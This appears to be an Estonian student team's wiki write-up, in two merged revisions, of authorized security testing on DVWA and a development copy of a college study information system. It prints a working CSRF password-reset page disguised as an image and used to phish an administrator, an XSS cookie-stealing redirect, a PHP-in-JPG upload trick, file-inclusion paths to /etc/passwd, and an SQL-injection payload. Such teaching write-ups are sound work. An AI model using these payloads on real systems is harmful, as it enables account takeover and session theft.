Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
====Burp suite====

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

====Nessuse algkäivitamine====
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===

====Väike upload tegevus, mis võiks olla teisiti====
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.
Proovisime üles laadida:
<li>filmi
<li>exe
<li>jpm faile
<br>kõik läks läbi ja sai uploadida.
<br>Sellises kohas võiks olla süsteem tehtud <b>whitelisti</b> põhimõttel,
<br>et lubatud oleks ainult:
<li>.doc
<li>.docx
<li>.pdf

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Arvamused intensiivõppe nädala kohta ==

Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.

Urmo: Intensiivõppe nädalaga sai õpitud nii mõndagi huvitavat veebiturve ja selle testimise kohta. Kuna aega oli vähe, siis sai hulgaliselt kogemust ja oskust reaalselt planeerida mahukat tööd täiesti nullist kuni reaalse rakendatava tulemuseni ning pani proovile stressitaluvuse tõestamaks pinge all jätkusuutlikku töötamist. Intensiivõppe nädalal võiksid osaleda kõik, kellel väheke tahtmist midagi uurida ja korda saata ning saada reaalset töökogemust ennem töömaailma sukeldumist.

== Tegijad ==
:Alo Konno A21
:Urmo Lihten A21
:Taavi Podžuks A22
:Matis Alliksoo A22
:Sander Saarm A22

== Juhendajad ==
Täname oma juhendajaid:
:Mart Mangus
:Margus Ernits
:Valter Kungla

Security team

2012-03-30T21:05:49Z

Ulihten: /* 1. päev - Materjalidega tutvumine */

== 1. päev - Materjalidega tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

::A1: Injection - Urmo
::A2: Cross-Site Scripting (XSS) - Alo
::A3: Broken Authentication and Session Management - Sander
::A4: Insecure Direct Object References - Alo
::A5: Cross-Site Request Forgery (CSRF) - Taavi
::A6: Security Misconfiguration - Matis
::A7: Insecure Cryptographic Storage - Matis
::A8: Failure to Restrict URL Access - Urmo
::A9: Insufficient Transport Layer Protection - Taavi
::A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] <br>
Taavi esitlus [[Media:A9.pdf]] <br>
Taavi esitlus [[Media:A5.pdf]] <br>
Matise esitlus [[Media:Insecure Cryptographic Storage.pdf]] <br>
Matise esitlus [[Media:Security Misconfiguration.pdf]] <br>
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] <br>

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev
:1.1 Tutvuda OWASP’iga.
:1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.
:1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.
2. Päev
:2.1 Esitada tiimi tegevusplaan.
:2.2 Tutvuda turvariskidega natuke põhjalikumalt.
:2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.
:2.4 Täiendada esimese päeva ettekannet.
3. Päev
:3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.
:3.2 Saadud tulemuste dokumenteerimine.
4. Päev
:4.1 Saadud tulemuste esitlemine ettekandega
5. Päev
:5.1 Tulemuste parandamine wiki’s.

=== Alo tegevus ===
==== Acunetix Web Vulnerability Scanner v. 8 automaatskännimise tööriistaga tutvumine ====
http://www.acunetix.com/support/vulnerability-checks.htm
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.youtube.com/watch?v=SG1cvGQ971g
http://www.isecom.org/research.html
http://evuln.com/tools/
http://sectools.org/tag/web-scanners/
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmise põhjalikkusega skänni.

Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.

Antud programm võimaldab skännida:
:Cross-Site Scripting (XSS)
:SQL Injection (blind test)
:File inclusion
:Code Execution
:LDAP Injection
:Cross Frame Scripting
:SQL Injection (error msg. test)
:CRLF Injection
:Directory Travelsal
:XPath Injection
:URL Redirection
:Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".
Määrata ära tuli ka, et mitu päringut sekundis tehakse.
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.
Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.
Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.
Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.
Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.
Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.
Ründe stiiliks määrata Pitchfork.
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.
Kahjuks ka see rünne ei toiminud teadmata põhjusel.
Proovitud sai ka lühemate nimekirjadega ja edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.
Võtsime lehe Source Code lahti
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.
Current Password lahtri jätsime samaks.
Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".
Salvestasime faili ja käivitasime selle.
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna ".

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev - Dev-ÕIS'i turvatestimine==

=== Alo tegevus ===
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.<br>
Faile saab alla laadida enda profiili all õppesooritustes.<br>
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.<br>
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.<br>
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.<br>
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.<br>
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.<br>

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
